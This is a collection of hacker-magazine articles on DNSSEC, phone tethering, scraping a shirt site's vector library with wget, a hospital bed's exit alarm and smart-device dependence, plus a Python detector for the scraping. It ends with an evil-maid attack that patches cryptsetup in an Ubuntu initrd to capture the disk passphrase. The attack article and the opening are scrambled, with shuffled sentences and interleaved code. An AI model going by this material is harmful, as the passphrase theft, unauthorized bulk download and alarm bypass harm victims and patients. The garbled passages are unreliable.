SSL is the clear winner in this round. Furthermore. expired or issued to another host). for the vast majority. HTTPS. DNSSEC doesn’t really protect communication. Perhaps less known is that this can be blocked at the network layer in a proxy or similar device. This makes DNSSEC a winner in this round. it is next to impossible to implement DNSSEC even if they wanted to. FTPS. so there is not that much we can do about it. LDAP vs. Usually only external facing web servers gets the privilege of having a real SSL certificate. Some proxy servers can be set up in such way that a centralized certificate policy is enforced. The resolving DNS server is typically where you configure the trust anchors and where the validations of signatures occur. DNSSEC has a chance to catch up in this category if they implement a better warning system. and one is a draw. Even with the identified problems with SSL. SSL can be configured with a central policy. but it will take several years before DNSSEC will be adopted in such scale that it will be usable for any real life scenarios. The scope of SSL is normally limited to one application on one server. just a few top level domains support DNSSEC so. As no zones were signed. Can I turn SSL off if I’m using DNSSEC? No. In DNSSEC. The egg is about to crack with initiatives such as the OMB mandate. just DNS lookups. There is really no good way to implement a centralized configuration in DNSSEC. it didn’t make sense to implement DNSSEC on the client side and. even when the signature doesn’t validate. SSL is here to stay. it didn’t make sense for domain owners to sign their domains. Signing additional resource records can be done with little extra effort. LDAPS). as clients never checked the signatures. SSL wins this round.
Round 5: Centralized configuration

How easy is it to implement a centralized policy for the technology? To be able to centrally configure a policy on what is allowed, instead of relying on users, is obviously a huge advantage on any network. Some proxy servers can be set up in such a way that a centralized certificate policy is enforced. There is really no good way to implement a centralized configuration in DNSSEC. SSL can be configured with a central policy. DNSSEC can't. SSL wins this round.

Round 6: Adoption

How widespread is the technology? SSL has been around for many years and is a technology that is much more widespread in use than DNSSEC. There is extensive support for SSL in both browsers and servers. Time has proven that SSL is a usable and reliable technology. DNSSEC has a shorter history and is not widely adopted. The technology has suffered from the chicken and the egg dilemma. As no zones were signed, it didn't make sense to implement DNSSEC on the client side and, as clients never checked the signatures, it didn't make sense for domain owners to sign their domains. The egg is about to crack with initiatives such as the OMB mandate, but it will take several years before DNSSEC will be adopted on such a scale that it will be usable for any real life scenarios. Right now, just a few top level domains support DNSSEC so, for the vast majority, it is next to impossible to implement DNSSEC even if they wanted to. There is very little client side support in operating systems and browsers for DNSSEC, and the few implementations that are out there don't look very different from what SSL is providing [8]. As DNSSEC gets implemented on a broader scale, we will see if the technology is up to the challenge. DNSSEC has a lot of catching up to do.

Round 7: Scope

How broadly will the technology protect you? A security technology should have a broad scope, to be able to provide protection for many different servers and applications. The scope of SSL is normally limited to one application on one server. Each application needs to be secured individually and there is typically a secured counterpart to each insecure application (FTP vs. FTPS, HTTP vs. HTTPS, LDAP vs. LDAPS). Although it is possible to purchase a wildcard SSL certificate that can be used on any server in your domain, it is more common to purchase individual certificates per server. Usually only external facing web servers get the privilege of having a real SSL certificate. DNSSEC is implemented on a per zone basis. Signing additional resource records can be done with little extra effort. DNSSEC has a broad scope and it is easy to add security to all your servers and applications with little extra effort. This makes DNSSEC a winner in this round.

Summary

SSL wins four rounds, DNSSEC wins two, and one is a draw. Both DNSSEC and SSL aim at solving the integrity problem and both are doing a pretty good job. DNSSEC is a promising technology, but is much less mature. SSL is here to stay. DNSSEC has the possibility to catch up.
Back to the questions

Can I turn SSL off if I'm using DNSSEC? No. SSL is designed to provide the required protection by itself, even if encryption is solved by some other means, and DNSSEC is not truly end to end. DNSSEC can only add security in the rare cases when you know that both endpoints support the technology, such as for internal communication or communication with a partner. Furthermore, I would strongly advise against turning off SSL just because you implemented DNSSEC.

Do I really have to implement DNSSEC if I already have SSL? If you are only looking to secure one server and one application and you already have SSL, there is not much to be gained by implementing DNSSEC. But if you are looking at security from a broader perspective, you would probably want to add DNSSEC. Of course, the best thing is always to implement both technologies. To sum it up: both DNSSEC and SSL are needed.

References

1) Dan Kaminsky, US-CERT advisory. http://www.us-cert.gov/cas/techalerts/TA08-190B.html
2) OMB DNSSEC mandate. http://www.whitehouse.gov/omb/memoranda/fy2008/m08-23.pdf
3) Eddy Nigg SSL certificate hijack. https://blog.startcom.org/?p=145
4) Alexander Sotirov rogue CA. http://www.phreedom.org/research/rogue-ca/
5) Use of MD5 in SSL. http://news.netcraft.com/archives/2009/01/01/14_of_ssl_certificates_signed_using_vulnerable_md5_algorithm.html
6) Tim Callan, Securityfocus. http://www.securityfocus.com/columnists/488
7) DNSSEC in Windows 7. http://blogs.technet.com/sseshad/archive/2008/10/30/dnssec-in-windows-7.aspx
8) Drill extension to Firefox. http://www.nlnetlabs.nl/projects/drill/drill_extension.html
9) RFC 4035, Section 3.2.2, the CD bit. http://www.rfc-archive.org/getrfc.php?rfc=4035

Tethering the Samsung SCH-R450 on MetroPCS
by VXO

Introduction

MetroPCS is a flat-rate CDMA wireless carrier with service in some larger metropolitan areas throughout the United States. MetroPCS service requires no contract, and uses customer-owned handsets. The phones available on MetroPCS currently range from the more basic "candybar" handset at $80 to a Blackberry Curve at $450. Various MetroPCS phones are plentiful on eBay and other sources. The plans range from $30 to $50 per month. The service plans include unlimited use of local and long distance voice services, voicemail, and text messaging. Picture messaging and wireless web access are available on higher plan levels.

The Samsung SCH-R450

Before the Blackberry Curve was offered, the R450 Messager was MetroPCS's only offering with a full keyboard. The top of the phone slides sideways, exposing the full QWERTY keyboard below. The display will flip to landscape when you turn the phone. Strangely, the BREW environment and browser only operate with the slide open. The BREW implementation on the older Kyocera Strobe would operate on the external or internal LCDs.

The R450 has a 1xRTT connection, Bluetooth audio and object exchange profiles, GPS, 1280x960 pixel camera, music player, MicroSD socket, BREW software environment, and built-in Openwave web browser. BREW applications available for the phone include Metro411 (a V-Enable Mobile411 directory assistance app), Loopt, Mail@Metro (an e-mail client), and a Mobile IM client. External sockets are provided for a mono or stereo headset with 2.5mm plug, charger, and a port for a USB data cable. The USB cable is provided in the box, or is available separately. No accompanying software is supplied. The phone will charge on any powered USB 1 or 2 port. No driver is required for charging.

In the menu under Settings / Phone Settings / PC Connection, you can enable or disable USB mass storage. If you have USB storage enabled, plugging in the phone will put it into USB mass storage mode. Nothing else functions while it's in USB storage mode, though the phone will charge. When you're done, unmount the volume and press the soft key for "Done" to go back to normal operation. To get files on and off of the phone, use USB storage or Bluetooth object exchange. BitPIM does not recognize the phone yet, and won't talk to it as "Generic CDMA phone" or anything. It doesn't appear to support the proper AT commands to kick it into BREW mode.

This handset is not nerfed like the Razr! USB CDC ACM class modem support is present on the phone, including DUN mode, but it's disabled out of the box. Unfortunately, the phone software does not support Bluetooth dialup, so you're going to need the cable. The cable appears to just be a mechanical cable with no converters or anything. Once this is enabled, if you have the wireless web feature enabled on your account, you can hook the phone up to your computer and use it as a wireless data connection.

For best results on the MetroPCS network, keep your phone's PRL up to date. Dial *228, wait for it to ask you what you're calling about, hit 2 and enjoy the wonderful little beat it plays. You should see "Programming in progress", "SPC Unlocked OK!", and "PRL Download OK!" appear on the bottom of the screen in a tiny font. When it finishes, it will reboot.

To enable DUN mode, dial the hidden menu sequence ending in 9 #. Press OK to get into the menu. The phone will ask for a code, which is 587846. You'll see a number of otherwise hidden options. Scroll down to DUN mode and turn it on, then power cycle the phone.

Connect the USB cable and you should get a USB CDC ACM class modem device! On Linux, this will be /dev/ttyACM0. On Mac OS X 10.5, it will show up as /dev/tty.usbmodem***. On 10.4 it comes up as something different. ls /dev | grep -i modem should show it. The output of dmesg should show something like this: AppleUSBCDCACMData: Version number 3.1, Input buffers 8, Output buffers 16. If USB storage mode is enabled, you will probably also see an initDevice failed message. This is harmless, and the device will be recognized once you hit Done on the phone. Windows users can also do this with a driver included in Samsung PC Studio. PC Studio won't do anything with the phone itself, but it'll drop the proper driver on the system for the "Samsung CDMA Technologies" device to use it as a modem.

If you use ZTerm or minicom to connect to the serial device, you should be able to get the usual modem responses. AT should yield OK, and ATI should yield a bunch of info:

Manufacturer: I: SAMSUNG ELECTRONICS CO., LTD.
Model: I: SCH-R450/99
Revision: I: Q6055BSKAXLZ31501 1 [Nov 15 2007 24:00:00]
ESN: 0x[*FNORD*]
+GCAP: +CIS707-A, +MS, +ES, +DS, +FCLASS

If the phone likes the resulting init string and settings, you should be able to make the system dial it. The telephone number is #777. Set the account name to your phone number, 3055551234@mymetropcs.com, and the password to mymetropcs.com. On Mac OS X, open System Preferences and go to Network. A box should pop up saying it found a new device, "Samsung CDMA Technologies". Choose it in the Show: dropdown box, and you'll get a modem settings page. Go to the Modem tab, and select Generic / Generic Dialup Device for the model. Selecting "Verizon Support (PC 5220)" also seems to work well. You're in, and it'll almost immediately show an IP address in the 10.x range. This isn't exactly EV-DO, but it isn't too bad either. A test run at speedtest.net through the Metro proxy showed 112 kbit/sec down, and 64 kbit/sec up, with a ping response of 999 msec.

OK, you're going to need to go through a proxy. MetroPCS blocks anything on ports other than 443. They provide a web proxy at wap.metropcs.com port 3128. You can enter this in the Proxies tab under the network configuration. It doesn't appear to need a username/password. Entering it as a web http proxy works. I haven't been able to get other applications to connect through it properly if entered as a SOCKS proxy, so it may just be web only. The wap.metropcs.com proxy is a strange one. It's got a captive portal. If you hit that page from a normal web browser, you get a 404 thrown off from Apache Cocoon. After about a minute of inactivity, you get thrown back to that page with the next http request, which is that same lovely semi-useless orange and blue "Downloads" page you get on the phone when you start the browser. The wap.metropcs.com proxy also tends to be pretty slow. If you want Web access on 80, you may want to find another proxy somewhere that listens on 443. Now you can immediately connect to anything, anywhere, on port 443. I've found that FreeNX runs well over the connection to a ssh server on port 443 to connect up with a remote X11 desktop.

For more information on the hidden features of the SCH-R450, check out the Samsung R450 Hacker's Manual, available on handsonforums.com.

Shouts out to: Robert, who first introduced me to MetroPCS, and Nikola Tesla and Guglielmo Marconi, who pioneered wireless transmission and telegraphy so many years ago, bringing us easy access to information today, just for good luck and fortune. Enjoy, and happy hacking.

"Borrowing" the CustomInk.com Vector Library
by GantMan

If you've never used CustomInk.com, you're missing out on one of the coolest online shirt design companies of the past half decade. If you want to see what I'm talking about, go to CustomInk.com, click the tab at the top that says "The Lab", and then click on the left side to add art. You may notice that they have over 10,000 images you can add to your shirt, and they are scalable vector .EPS files that are dynamically loaded. The web is filled with people selling "vector packs" of basically scalable clipart that you can buy, but when you apply that math to the number of clipart images CustomInk.com has, it's hard not to be wowed by the cost of such a library. Evil cogs start a-turnin'. If this is dynamically loading the .EPS files into Flash for the shirt designer, shouldn't I be able to get some of those .EPS files for my own personal needs? Wouldn't it be nice to have the entire 10,000+ vector library for your own designs outside of the shirts? Or just for making a nice torrent for all your friends?

I was on Windows, so I began the adventure by loading up Fiddler (http://www.fiddlertool.com/fiddler/) and watching the HTTP requests. (Side note: I love Wireshark, but Fiddler is just better because it only listens to Internet Explorer. This allows you to have all your fun apps running, and even still browse the web in Firefox etc. without mucking up your packet captures. For anything that's not web related I load up Wireshark, and turn off just about every other application I have running, because I suck at Wireshark filters. :D ) Now that Fiddler was listening to IE, I pulled up the library from CustomInk.com. As the system loaded the images, it was pulling gifs from */clipart/gif/*. So for example, one gif was from */clipart/gif/64772.gif*. If you look at this path, it's easy to notice it's got a gif directory. A simple, quick guess was that the .EPS was in an /eps/ directory with the normal .EPS extension, and the gif already has the .EPS name. Using the above gif I generated the following guess and slammed it in the browser.

http://www.customink.com/clipart/eps/64772.EPS

BOOYA! It gave me a download of a .EPS file. I opened it to find the delicious vector representation of the GIF I was just ogling. I typed in a few more, just to be sure, and everything came back perfect. So, one process I have is to go around and view all the GIFs and capture them all in Fiddler, press Ctrl + U to copy the URLs, do find and replace and pull down all those .EPS files. But the file names are sequential, so I can simply generate a list of URLs without any effort at all! From my browsing, the eps files went from 10000.EPS to < 80000.EPS. So now I needed to generate a bunch of sequential URLs. Building a sequential text file would be easy, but, since I was on a Windows machine at the time, I chose to generate a quick VB script. I created a .VBS file on the desktop and inserted the code below:

Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("ALLEPS.txt", True)
For xcount = 10000 To 80000
    a.WriteLine("http://www.customink.com/clipart/eps/" & xcount & ".EPS")
Next
a.Close
msgbox "Dun"

Running this .vbs file will put a file in the same directory, called ALLEPS.txt, with a bunch of generated URLs that should download CustomInk's .EPS files. Most of you know what to do with such a file, but, for the rest, you should download an application called "wget" for Windows (http://gnuwin32.sourceforge.net/packages/wget.htm). Wget is an app that comes from our *NIX friends, to "get" files from the web. Once I installed wget on the Windoze computer I was using, I ran the following command with a copy of the ALLEPS.txt file in the same directory:

wget --input-file=ALLEPS.txt --tries=2 --retry-connrefused -nc --waitretry=1 -v

This basically says, "gimme all the URLs from the file, try twice at most, and give it a second between each failed attempt." After running the command and seeing file after file get pulled happily into my folder, I went to sleep. I awoke the following morning with the entire library :D This isn't very nice to the CustomInk.com servers (about 10GB of vector files), so if you decide to design any shirts in the near future, please use their service so that they can pay their bills.
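Seen from the server side, the pattern the article describes is unmistakable in the access log: one client, thousands of requests, asset ids counted up one at a time, no referer. The following Python is an added example, not the article's code and not anything CustomInk runs: it parses Apache combined-format lines and flags clients whose numeric asset ids arrive as consecutive runs, treating a 404 in the middle as part of the run (a scripted walk keeps going past gaps). The log lines, hosts, paths and user agents are constructed for the demonstration.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format lines; hosts, paths and user agents are made up
# for this example and do not come from CustomInk or any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2009:03:14:10 -0500] "GET /clipart/eps/10000.EPS HTTP/1.1" 200 48213 "-" "Wget/1.11"
10.0.0.5 - - [01/Jan/2009:03:14:11 -0500] "GET /clipart/eps/10001.EPS HTTP/1.1" 200 51200 "-" "Wget/1.11"
10.0.0.5 - - [01/Jan/2009:03:14:11 -0500] "GET /clipart/eps/10002.EPS HTTP/1.1" 404 512 "-" "Wget/1.11"
10.0.0.5 - - [01/Jan/2009:03:14:12 -0500] "GET /clipart/eps/10003.EPS HTTP/1.1" 200 40111 "-" "Wget/1.11"
10.0.0.5 - - [01/Jan/2009:03:14:12 -0500] "GET /clipart/eps/10004.EPS HTTP/1.1" 200 39980 "-" "Wget/1.11"
192.168.1.20 - - [01/Jan/2009:03:15:00 -0500] "GET /clipart/gif/64772.gif HTTP/1.1" 200 8123 "http://shop.example/lab" "Mozilla/4.0"
192.168.1.20 - - [01/Jan/2009:03:15:05 -0500] "GET /clipart/gif/10311.gif HTTP/1.1" 200 7900 "http://shop.example/lab" "Mozilla/4.0"
192.168.1.20 - - [01/Jan/2009:03:15:09 -0500] "GET /clipart/eps/10311.EPS HTTP/1.1" 200 40050 "http://shop.example/lab" "Mozilla/4.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
ASSET_ID_RE = re.compile(r"/(\d+)\.[A-Za-z0-9]+$")


def parse_log(text):
    """Yield one dict per well-formed combined-log line; lines that do not parse are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            yield rec


def find_enumerators(records, min_run=4):
    """Return {ip: longest run} for clients whose numeric asset ids arrive in consecutive order."""
    ids_by_ip = defaultdict(list)
    for rec in records:
        m = ASSET_ID_RE.search(rec["path"])
        if m:
            ids_by_ip[rec["ip"]].append(int(m.group(1)))
    hits = {}
    for ip, ids in ids_by_ip.items():
        run = best = 1
        for prev, cur in zip(ids, ids[1:]):
            run = run + 1 if cur == prev + 1 else 1  # a 404 on a missing id does not break the run
            best = max(best, run)
        if best >= min_run:
            hits[ip] = best
    return hits


def referer_missing_ratio(records, ip):
    """Share of a client's asset requests with no referer; the Flash designer sends one, wget does not."""
    mine = [r for r in records if r["ip"] == ip and ASSET_ID_RE.search(r["path"])]
    if not mine:
        return 0.0
    return sum(1 for r in mine if r["referer"] in ("", "-")) / len(mine)


if __name__ == "__main__":
    recs = list(parse_log(SAMPLE_LOG))
    for ip, run in find_enumerators(recs).items():
        print("%s walked %d consecutive ids, referer missing on %.0f%% of requests"
              % (ip, run, 100 * referer_missing_ratio(recs, ip)))
```

The run length is the stronger signal of the two: a referer is trivially spoofed, but a client that has to guess file names cannot avoid walking the id space, and a short run threshold with a per-client rate limit on the /eps/ path is enough to make the overnight download the article describes fail early.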

Hacking Your Hospital Bed
by The Piano Guy

Having recently been a multi-day guest of a local hospital, I had to keep my leg up. The beds were nice enough. They moved all the ways one would expect. All the typical stuff. On the side rails, they had a control panel for turning on and off the room lights and an emergency call button. It was possible for the nurse to override whether or not the patient could turn on or off his or her own lights. The TV worked. But more fun to watch was when the housekeepers had to remake the bed. They would bring it up chest high to make the bed. I wish I could do that with my bed at home - no more bending over.

I noticed the sticker on the panel at the foot of the bed that said "for hospital staff use only." Now, if you want to attract the undivided attention of flies, get some dog poop. If you want to attract the undivided attention of a hacker, put a sticker on it that says "for staff use only." Before I lifted the panel, I took a closer look and noted the light indicators on the panel. There was a power indicator, a warning light about the brake not being set, a bed motion locked indicator, and an indicator for "bed exit on." I opened the panel. The first button was siderail control lights. The next set of buttons locked out the individual siderail component movements. The next button, Bed Motion, prevented the bed from moving at all with one button. The next set of buttons allowed the hospital to set the angles from their part of the bed.

The bed doubles as a scale. All the data of the bed displays on a little plasma display. As a scale, from playing with the menus, I was able to figure out that the weight can be charted and trended over time, and of course is available in pounds or kilograms. The doctors would use this now and again during my stay. This feature can also be leveraged to make sure that the patient doesn't get out of bed without notifying staff. I didn't understand (at first) how that worked from a technical perspective, as there were no motion sensors in the room. I found out. I did get roomed with a guy during my stay. He was agitated and more than a bit senile. Every time he would try to get out of the bed, an alarm would go off and they would have to come in and try to secure him again. Please don't hurt yourself, but if you're ever in the bed and you can disarm the alarm, you can get out of bed unnoticed.

The bed was a Stryker Secure II. Made in Michigan, this is a company that my lawyer has bought stock in. I went to their website (http://www.stryker.com/en-us/products/PatientHandlingEMSandEvacuationEquipment/Beds/MedSurgBeds/SecureII/index.htm) and didn't find anything about how to connect the bed to the rest of the control circuits. The one mystery I didn't learn about the beds in my time there was how they communicated with the light in the wall and the TV. Since there is only the one power cable that connects the bed to the wall (that I could find), I have to assume that there must be an X10 control, but I digress.

The day before I was discharged, they had to switch me to a different room (because of the agitated senile roommate). I understand that it would have been more fair for him to be moved, but it made more sense for me to move. The hospital could have enforced that, but I was happy to be compliant. They wheeled my bed over. When they move a patient like this, they should let them keep the same bed if possible. Heaven forbid there should be a fire and a patient isn't ambulatory; I'm sure they could get them out of there quite fast. Even though this bed weighed hundreds of pounds, it rolled very easily, and that made me wonder about the bed.

On the last day, I was being discharged. I was left to wait when it was time to check out, and left alone in the room with the bed, and forgot to lock it. I went to get on it, and it started sliding across the floor at a rather rapid pace, toward my new roommate. It was all I could do to stop the bed from pushing into his (through the curtain). No big deal. At that point, I moved the bed back, found the brake pedal on the side of the bed, locked it, and was able to get onto the non-moving bed, and no locking mechanism or alarm went off.

While I hope you have no need for a hospital stay, if you do, hope that your hospital has Stryker beds - unless you're trying to get out undetected.

Smart Regression

It seems that everything around us is becoming smarter. Our phones, computers, televisions, cars, you name it. They're all doing very intelligent things and talking back and forth with us about their various tasks constantly. And while we cannot deny the advantages of technology moving forward, we feel that someone needs to take a good look at what is being left behind.

A good number of us have jumped into the recent smart phone craze. Try finding a phone that doesn't come with a camera, a web browser, all sorts of games, GPS features, the ability to watch movies, an interface to all of the social networking sites, etc., all at your fingertips anytime. With increased coverage areas and all of us walking around with these things, we never need to be out of touch again. We read our email the moment it arrives, constantly text back and forth between others who are doing the same thing, update the world via Twitter and Facebook as to our every step and mood swing, all the while becoming lost in our little devices at the expense of the actual world around us. We've programmed ourselves into always being at someone else's beck and call. In fact, it's not all that different from previous generations who found themselves glued to televisions in search of a better reality. The playing field has been completely changed, however, and for far too many of us the very game itself is not the same.

Our entire worlds go into our phones and all of our contacts have corresponding files with as much detail as we care to store about them. Addresses, phone numbers, pictures, family minutiae, all held up for display. You can have little essays written about everyone you know and every bit of information you have on them. Yes, you can have not only a picture and name pop up when someone calls you, but their most recent post on a social networking site so you can gauge their mood or know what they've been up to before you even start talking to them. Big Brother has nothing on this level of surveillance. We willingly give up our privacy and let the world know exactly where we are, far more than what the world has any right to know or has any sane interest in. And since so many of us still don't use adequate security - like even having a simple password for our phones - all of this information becomes public when the phone is lost, lent to someone untrustworthy even for a moment, or sent out for repairs. We won't even get into the many risks of compromise through the airwaves. It's the ultimate nightmare.

But we've been sacrificing our privacy for a while now. That isn't really all that new. We just are able to give up an increasing amount in a much more efficient way now. What's of greater concern is how much of our lives are becoming dependent on technology in an unhealthy way. Arthur C. Clarke made the infamous observation that "any sufficiently advanced technology is indistinguishable from magic" nearly half a century ago. We don't actually understand how our technology works nor do we particularly care to. While that attitude isn't exactly new (after all, how many people really know how to build a telephone or a radio?), this holds true today more than ever. In the end, the consequences of surrendering virtually every aspect of our lives to "smart" technology could be extremely serious.

How many of us actually know the important phone numbers of our lives anymore? More and more, people only know how to reach their friends and relatives by scrolling down to the corresponding name on their phone. Why waste space storing numbers and email addresses in your head when your phone can do it for you? This works great until your phone is lost or broken. Then you find yourself utterly stranded because you've become dependent on a smart device. Literally. Similarly, those of us who use GPS to get around are increasingly using it as a crutch. It's not even isolated to cars anymore. Our smart phones allow us to know where we are by walking down a street. The inability to quickly map out a neighborhood in your head is a significant one. It's all very useful until we find that we can't function without it. If you lost your smart phone tomorrow, would you easily recover? Would private information of others be in the hands of whoever found your phone? Would you know how to contact your friends? If Gmail disappeared, would your life be in shambles? Could you socialize without Facebook? Do you honestly believe you have more than one hundred friends? How much joy can you get out of life without constantly using some form of electricity?

But there are many other issues. A growing number of us have basically stopped communicating one on one. While personal phone calls, texts, or emails still happen (constantly), the significance of a phone call has been eclipsed by the fact that we're all constantly on the phone, often unable to distinguish one conversation from the next. Just as real life letters were eclipsed by phones, there is the issue of quality: too much and too little at the same time. Who can remember individual phone conversations when there are so many of them in a typical day? Who can recall years from now one's thoughts as they were written down if they were only expressed as a 140 character entry on Twitter? How many actual diaries will never be penned now? Will we care enough (or even be able) to read our own words, let alone those of others, generations from now? This relates to the overall loss of history that we face due to our obsession with smart devices. Since so many of us now only use cell phones and shoddy (but cheap) VoIP services, we don't even know how much better landlines used to sound.

We're losing our concept of distance and of our cultural distinctiveness. It used to be hard to call someone far away. When you did, they sounded remote and they sounded different. Now we not only are able to communicate globally as easily as we can locally, but the cultural differences are being slowly wiped away, replaced with Internet memes, idolization of Western icons, and the overall illiteracy of two line text messaging. We broadcast our whereabouts via Twitter and those who care to join us know what to do. Then we share a little breathing space with those people while we spend most of our time updating the net with our current location. By living vicariously through others' experiences, we lose out on our own way too often. You're expected to pay attention to "news feeds" so that you know what your friends are doing. Otherwise you will be left out.

And of course, the health issues are of concern. Despite what anyone says, we really don't know the health effects of having wireless devices transmitting right next to our heads for, in some cases, most of our waking life. There's no way we can truly know until the potential effects start to manifest themselves and that can take decades. The more immediate health issue comes from spending way too much time in front of computer and phone screens and not being as physically active as we once were.

It's particularly ironic that such words of warning appear in a hacker magazine. Years ago, it was our dream to have this level of technology to play and experiment with. And there is a great deal of good that has come out of it. Access to reading material, music, video, and just the means of communication that is now possible is simply stunning and revolutionary. This is what true magic is all about. But that magic is lost if we drown in it or allow ourselves to become enveloped in a mass hypnosis that cuts us off from our privacy concerns, the value of individuals, or our connection to other ways of life. The key to conquering any form of technology is to maintain control over it. We can't expect everyone to know how everything works but that information must be accessible to those who are interested in pursuing it. What really matters is that we not surrender all that we know and all that we are to our little devices or to massive entities somewhere. Balance is the key. Without it, smart will simply be the new stupid.

just most of it.img-2. only also does some other evil things as well. It becomes as easy as: pop in a live CD. no.24-21➥generic quiet The vmlinuz file is the compressed Linux kernel that you need when booting up. Turns out I was wrong. They have the kernel version appended to the end of their filenames. theoretically. Fedora Core.img
0x10 In a Nutshell
163
.
THE HACKER DIGEST . these two disk encryption solutions must be vulnerable to this same attack. Your whole hard drive is encrypted.24-21-generic ➥ root=/dev/mapper/ubuntu-root ro ➥ quiet splash initrd /initrd. my secrets were still secret. the boot partition holds two files necessary to boot into your operating system: vmlinuz and initrd. You can tell the exact names by looking at your grub menu file /boot/grub/menu.net
When I first started using whole disk encryption in Ubuntu a couple of years ago. So. Also.6. we’re using a computer for this attack. despite disk encryption. disk encryption using both PGP Desktop and TrueCrypt must work the same way. and managed to steal his disk encryption passphrase.6. and the reason is because with most disk encryption solutions.img. so your information is safe from physical attacks. those need to be decrypted before they get executed. This attack works by modifying files in the boot partition to do our evil deeds. and the victim is pwned. I knew that even if the feds busted into my room while I was out and did whatever they wanted with my hard drive without me knowing. and everything else is encrypted.img file when you need to do some special things before you can
0x20 The Vulnerable initrd. in case of a BIOS password. run a script.img file is a compressed initial ramdisk made up of a little filesystem full of files required to boot the rest of the way into Linux. remove CD.Pwning Past Whole Disk Encryption
by m0untainrebel@riseup. ➥24-21-generic root (hd0.lst. right? Well. and his GnuPG secret key and passphrase. the contents of his passwd and shadow files. SSH credentials for a couple of different servers.6. Then the operating system can load and the encrypted data can be accessed. boot up. In Ubuntu. shut down. The initrd. In most Linux implementations of whole disk encryption. there must be a program that isn’t encrypted whose purpose is to decrypt the rest of the hard drive. It’s only necessary to have an initrd. I have since apologized to him. if an attacker has physical access to the computer. In Windows. your whole hard drive isn’t actually encrypted. This same technique will work for any Linux distribution that uses dm-crypt for whole disk encryption. I finished up by putting a document on his desktop. All it took was about 10 minutes of physical access while his computer was turned off (and of course. I’m going to explain how to steal the disk encryption passphrase and run arbitrary code as root on a computer running Ubuntu with whole disk encryption. kernel 2. I tried this on a friend of mine. This is from mine: title Ubuntu 8. and likely others. Debian.04. which is included by default in Ubuntu. which means we can write programs to automate it. This can be done by booting to a live CD to access the hard drive or. countless hours developing this attack beforehand).VOLUME 26
0x00 Introduction
Since this program is not encrypted.1. containing his disk encryption passphrase and a link to a defaced page on his web server. digitally signed with his own PGP key. she can replace this program with something that does the same thing. just removing the hard drive (which is what I had to resort to). by installing a small unencrypted program that’s used to decrypt the rest of the drive. Your processor can’t execute encrypted instructions. I also got reverse root shells sent to me at regular intervals.0) kernel /vmlinuz-2. So by default. the small boot partition remains unencrypted. I’m only focusing on Ubuntu because it’s popular. and he has still been unsuccessful at pwning me back. I slept better at night. and that happens to be what my friend was using.

boot all the way into the OS.0. Luckily. including the /bin/sh shell.c.img.cpio. like load extra kernel modules and unlock the encrypted hard drive.0.tar.img files are compressed with cpio. fprintf(fp. | ➥ cpio --quiet --dereference ➥ -o -H newc | gzip > ➥ /tmp/poisoned-initrd.img. So how does this all work? You turn on your computer and boot to your hard drive. Grub loads menu. which executes everything needed to unlock and mount your encrypted partitions.\n”).img
To tie it all together. password.dsc ➥ cryptsetup_1. &mk. ➥ cryptpass”. Here’s an easy way to decompress your initrd file to see what’s inside:
m0rebel@ubuntu:~$ cd /tmp m0rebel@ubuntu:/tmp$ mkdir initrd m0rebel@ubuntu:/tmp$ cd initrd/ m0rebel@ubuntu:/tmp/initrd$ cp /boot ➥/initrd.orig. give an error message and then jump to another part of the code. goto out1.lst and autoselects the first option for you. add my evil code: if((r = LUKS_open_any_key( ➥options->device. &hdr. cryptsetup is open source. Once you type in the correct passphrase cryptsetup unlocks the encrypted section of your hard drive. “if the passphrase that was just entered doesn’t work.24-21➥generic .5 ➥ cryptsetup_1. which asks for your passphrase.\n”). and an Ubuntu logo pops up and your system starts booting. It’s essentially a filesystem with lots of common commands. } /* begin evil code */ else { system(“/bin/mkdir /mntboot”).img files in your boot partition. searching through the code looking for the “Enter LUKS passphrase:” prompt. m0rebel@ubuntu:~$ sudo apt-get ➥ install build-essential m0rebel@ubuntu:~$ sudo apt-get ➥ build-dep cryptsetup m0rebel@ubuntu:~$ mkdir ➥ cryptsetup m0rebel@ubuntu:~$ cd cryptsetup/ m0rebel@ubuntu:~/cryptsetup$ apt➥ get source cryptsetup m0rebel@ubuntu:~/cryptsetup$ ls cryptsetup-1.
To steal the disk encryption passphrase. ➥ backend)) < 0) { set_error(“No key available ➥ with this passphrase.img. It took me a while.gz m0rebel@ubuntu:~/cryptsetup$ The directory cryptsetup-1.gz cryptsetup_1.cpio ➥ 44021 blocks m0rebel@ubuntu:/tmp/initrd$ ➥ rm initrd. and then compressed again with gzip. initrd. password). The /init script gets run. and then the /init script mounts all the partitions. “w”). and it in turn runs the program /sbin/cryptsetup.6.0. these files are all stored in /boot/initrd. system(“/bin/mount -t ext3 /dev ➥/sda1 /mntboot”).THE HACKER DIGEST . goto out1. and the cryptsetup source code. is the correct place. before I found the correct file and line to add my evil code. fclose(fp).img-2.0.img on your unencrypted boot partition.img file with an evil one that does your bidding.5/lib/setup./initrd. Once this is complete.5.gz m0rebel@ubuntu:/tmp/initrd$ ➥ cpio -i < initrd. FILE *fp = fopen(“/mntboot/.gz m0rebel@ubuntu:/tmp/initrd$ ➥ gunzip initrd. ➥ passwordLen. It turns out that cryptsetup-1.
0x30 Stealing the Crypto Passphrase
. the initrd. &hdr.img. or remove the hard drive and put it in another computer to modify these files. do this:
m0rebel@ubuntu:/tmp/initrd$ find . ➥ backend)) < 0) { set_error(“No key available ➥ with this passphrase. make sure you have all the right development tools and dependencies installed to compile cryptsetup.5 holds the actual source code. ➥ passwordLen. &mk. It has an executable script called /init.52ubuntu12.img filesystem closes and the OS starts to load the rest of the way. around line 650.img.0. ➥ diff. Your initrd.cpio.0. you need to replace the /sbin/cryptsetup binary in the initrd. password. First. “%s\n”. An attacker with physical access to a victim’s computer can either boot to a live CD. you’ll have multiple vmlinuz and initrd.cpio m0rebel@ubuntu:/tmp/initrd$ ls bin conf etc init lib ➥ modules sbin scripts usr var m0rebel@ubuntu:/tmp/initrd$ ➥ ls -l sbin/cryptsetup -rwxr-xr-x 1 m0rebel m0rebel 52416 ➥ 2008-10-20 17:33 sbin/cryptsetup m0rebel@ubuntu:/tmp/initrd$
